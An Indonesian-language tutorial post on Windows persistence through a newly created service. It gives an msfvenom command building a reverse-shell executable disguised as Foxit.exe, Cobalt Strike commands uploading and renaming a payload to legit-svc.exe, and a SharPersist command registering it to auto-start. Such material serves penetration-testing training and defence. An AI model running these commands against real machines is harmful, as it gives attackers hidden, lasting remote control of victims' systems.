Persistence via Windows Services
Seperti yang kita lihat pada materi sebelumnya, ada banyak Windows service yang berjalan sebagai SISTEM
.
Berbagai cara mengeksploitasi service untuk eskalasi hak istimewa juga bertindak sebagai persistensi, tetapi dengan mengorbankan service yang sah.
Sebagai gantinya, kita dapat membuat service kita sendiri yang tidak akan berdampak pada layanan yang sudah ada.
0x1 - Exploitation Stages
Step 1: Create Malware and Upload
1
2
# Contoh buat malware dengan MSF
➜ msfvenom -p windows/shell_reverse_tcp LHOST=192.168.49.73 LPORT=80 -f exe -o Foxit.exe
1
2
3
4
# Contoh upload file pada Cobalt Strike
beacon> cd C:\Windows
beacon> upload C:\Payloads\tcp-local_x64.svc.exe
beacon> mv tcp-local_x64.svc.exe legit-svc.exe
Step 2: Add Malware to Registry AutoRun
1
PS > .\SharPersist.exe -t service -c "C:\Windows\legit-svc.exe" -n "legit-svc" -m add
Perintah di atas akan membuat service baru dalam keadaan STOPPED
, tetapi dengan START_TYPE
diatur ke AUTO_START
. Ini berarti service tidak akan berjalan sampai komputer di-reboot. Ketika komputer dijalankan, service tersebut juga akan berjalan.
0x2 - References
- https://github.com/mandiant/SharPersist
- https://pentestlab.blog/2019/10/07/persistence-new-service/
This post is licensed under CC BY 4.0 by the author.